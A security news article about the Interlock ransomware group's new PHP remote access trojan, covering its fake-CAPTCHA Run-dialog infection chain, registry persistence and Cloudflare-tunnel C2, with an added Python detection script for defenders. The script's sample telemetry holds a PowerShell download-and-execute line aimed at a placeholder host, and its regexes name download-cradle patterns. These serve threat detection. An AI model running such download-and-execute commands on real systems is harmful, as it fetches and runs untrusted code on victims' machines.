Security researchers from The DFIR Report, in collaboration with Proofpoint, have identified a significant new campaign by the Interlock ransomware group. The threat actors are leveraging a newly developed remote access trojan (RAT) to target organizations across multiple sectors, marking a notable evolution in their tactics and tooling.
Sophisticated Infection Chain
The campaign begins with the compromise of legitimate websites, where attackers inject a single-line, heavily obfuscated script into site HTML. This script is designed to evade detection and only activates under specific conditions, increasing the likelihood of bypassing security controls.
Victims are then shown a convincing fake CAPTCHA prompt that instructs them to complete “verification steps.” The page has already placed a command string on the clipboard; the victim is told to open the Windows Run dialog (Win+R), paste the clipboard contents and press Enter, which launches a PowerShell command. That command downloads and executes the Interlock RAT payload, so the infection is carried out by the user’s own keystrokes rather than by a browser exploit.
Technical Capabilities of the New RAT
Unlike previous variants, which were built on Node.js (“NodeSnake”), the latest Interlock RAT is a PHP script run by a copy of the PHP interpreter. The change in runtime also changes the artefacts defenders should look for: a php.exe process running from a user-writable directory rather than a Node.js binary.
Upon execution, the RAT installs a copy of php.exe, together with its script, within the user’s AppData\Roaming directory. It achieves persistence by registering itself in the Windows Registry “Run” key, so it is launched automatically every time the user logs on.
Once active, the RAT conducts extensive reconnaissance, gathering detailed information about the infected system, including hardware specifications, running processes, services, mounted drives, network neighbors, and user privileges. This data is serialized as JSON objects and exfiltrated to the attackers’ command and control (C2) infrastructure.
The malware leverages Cloudflare’s quick-tunnel service (trycloudflare.com subdomains) for C2 communications, masking its true infrastructure and increasing resilience against takedown efforts. Hardcoded fallback IP addresses are also included to ensure continued operation if the tunnel hostname is blocked, so defenders who block trycloudflare.com lookups should also block the fallback addresses published with the report.
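The infection chain (Run-dialog paste of a PowerShell download cradle), the php.exe persistence under AppData\Roaming and the trycloudflare.com C2 channel described above each leave a distinct artefact in endpoint telemetry. The following detection logic, an added example that is not code from The DFIR Report, Proofpoint or the malware, runs those three checks over a small set of constructed events. The event schema (`kind`, `host`, `path`, `value`, `image`, `parent`, `cmdline`, `dest`) is a simplified assumption rather than Sysmon’s exact field names, and the sample events, hostnames and URLs are constructed for illustration.

```python
"""Detection logic for the Interlock PHP RAT chain, run over constructed telemetry.

Added example, not code from The DFIR Report, Proofpoint or the malware.
Events use a simplified, constructed schema (not Sysmon's exact field names);
the indicator rules follow the behaviours described in the article:
  * ClickFix: a Run-dialog (RunMRU) entry, or a PowerShell process whose parent
    is explorer.exe, carrying a download-and-execute command line
  * persistence: a Run key value launching php.exe from AppData\\Roaming, or
    php.exe itself running from that directory
  * C2: DNS lookups or connections to *.trycloudflare.com
"""
import re
from collections import Counter
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    rule: str
    host: str
    detail: str


POWERSHELL_RE = re.compile(r"\b(powershell|pwsh)(\.exe)?\b", re.I)
# download-cradle / inline-execution verbs commonly seen in pasted commands
DOWNLOAD_RE = re.compile(
    r"(invoke-webrequest|\biwr\b|invoke-restmethod|\birm\b|downloadstring|"
    r"invoke-expression|\biex\b|frombase64string|\s-e(nc|ncodedcommand)?\s)",
    re.I,
)
PHP_IN_APPDATA_RE = re.compile(r"\\appdata\\roaming\\.*?php\.exe", re.I)
RUN_KEY_RE = re.compile(r"\\currentversion\\run(once)?\\", re.I)
RUNMRU_RE = re.compile(r"\\explorer\\runmru\\", re.I)
TRYCLOUDFLARE_RE = re.compile(r"(^|\.)trycloudflare\.com$", re.I)


def check_event(ev: dict) -> list[Finding]:
    """Return the findings a single event triggers (possibly none)."""
    host = ev.get("host", "?")
    kind = ev.get("kind")
    found = []
    if kind == "registry_set":
        path, value = ev.get("path", ""), ev.get("value", "")
        # Win+R history: a PowerShell command typed/pasted into the Run dialog
        if RUNMRU_RE.search(path) and POWERSHELL_RE.search(value):
            found.append(Finding("clickfix_runmru_powershell", host, value))
        # autostart value that launches a PHP interpreter from the user profile
        if RUN_KEY_RE.search(path) and PHP_IN_APPDATA_RE.search(value):
            found.append(Finding("persistence_run_key_php_appdata", host, f"{path} = {value}"))
    elif kind == "process_start":
        image, parent, cmd = ev.get("image", ""), ev.get("parent", ""), ev.get("cmdline", "")
        # Run-dialog launches are children of explorer.exe
        if (POWERSHELL_RE.search(image) and DOWNLOAD_RE.search(cmd)
                and parent.lower().endswith("\\explorer.exe")):
            found.append(Finding("clickfix_powershell_from_run_dialog", host, cmd))
        if PHP_IN_APPDATA_RE.search(image):
            found.append(Finding("php_interpreter_in_appdata", host, f"{image} {cmd}".strip()))
    elif kind in ("dns_query", "network_connect"):
        dest = ev.get("dest", "")
        if TRYCLOUDFLARE_RE.search(dest):
            found.append(Finding("c2_trycloudflare_tunnel", host, f"{ev.get('image', '?')} -> {dest}"))
    return found


def triage(events: list[dict]) -> list[Finding]:
    """Run every rule over every event and return all findings."""
    return [f for ev in events for f in check_event(ev)]


def summarize(findings: list[Finding]) -> dict[str, int]:
    """Count findings per rule, e.g. for a triage dashboard."""
    return dict(Counter(f.rule for f in findings))


# Constructed sample telemetry: WS01 shows the full chain, WS02 is a benign
# web server that legitimately runs php.exe from its install directory.
EVENTS = [
    {"kind": "registry_set", "host": "WS01",
     "path": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU\a",
     "value": 'powershell -w hidden -c "iwr https://example.invalid/x | iex"\\1'},
    {"kind": "process_start", "host": "WS01",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": 'powershell -w hidden -c "iwr https://example.invalid/x | iex"'},
    {"kind": "registry_set", "host": "WS01",
     "path": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Updater",
     "value": r"C:\Users\alice\AppData\Roaming\php\php.exe -c C:\Users\alice\AppData\Roaming\php\cfg.txt"},
    {"kind": "process_start", "host": "WS01",
     "image": r"C:\Users\alice\AppData\Roaming\php\php.exe",
     "parent": r"C:\Windows\explorer.exe", "cmdline": "php.exe -c cfg.txt"},
    {"kind": "dns_query", "host": "WS01", "image": r"C:\Users\alice\AppData\Roaming\php\php.exe",
     "dest": "happy-words-lucky.trycloudflare.com"},
    {"kind": "process_start", "host": "WS02", "image": r"C:\php\php.exe",
     "parent": r"C:\nginx\nginx.exe", "cmdline": "php.exe -f index.php"},
    {"kind": "dns_query", "host": "WS02", "image": r"C:\Windows\System32\svchost.exe",
     "dest": "update.microsoft.com"},
]

if __name__ == "__main__":
    for f in triage(EVENTS):
        print(f"[{f.rule}] {f.host}: {f.detail}")
    print(summarize(triage(EVENTS)))
```

The rules are deliberately narrow: php.exe is flagged only when it runs from AppData\Roaming, so a server with a normal PHP installation (WS02) produces no finding, and the PowerShell rule requires both a download verb and an explorer.exe parent, which is what a Run-dialog launch looks like. Any one rule firing alone is a hunting lead; the same host hitting all three in sequence is the chain the report describes.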
Hands-On-Keyboard Attacks and Double Extortion
Researchers have observed evidence of hands-on-keyboard activity, with attackers actively interacting with compromised systems. This includes querying Active Directory and searching for backup-related accounts, likely to maximize the impact of ransomware deployment and increase leverage during extortion attempts.
The Interlock group continues to employ double extortion tactics, encrypting files and threatening to leak stolen data if ransom demands are not met.
Broad Targeting and Escalating Threat
This campaign is notable for its broad, opportunistic targeting. Rather than focusing on a specific industry, the Interlock group is indiscriminately attacking organizations across various sectors, increasing the potential for widespread disruption.
The shift from Node.js to PHP in their RAT demonstrates the group’s adaptability and commitment to evolving their techniques to evade detection and maintain persistence within victim environments.
Summary Table: Interlock RAT Campaign
| Feature | Details |
|---|---|
| RAT Language | PHP (new), previously Node.js (“NodeSnake”) |
| Initial Access | Compromised websites, fake CAPTCHA, clipboard string pasted into the Run dialog to launch PowerShell |
| Persistence Mechanism | Registry “Run” key pointing to php.exe under AppData\Roaming |
| Reconnaissance | System info, processes, services, drives, network neighbours, privilege level (exfiltrated as JSON) |
| C2 Infrastructure | Cloudflare quick tunnel (trycloudflare.com), hardcoded fallback IPs |
| Lateral Movement | RDP, Active Directory queries |
| Target Sectors | Broad, no specific industry focus |
| Extortion Method | Double extortion (encryption + data leak threats) |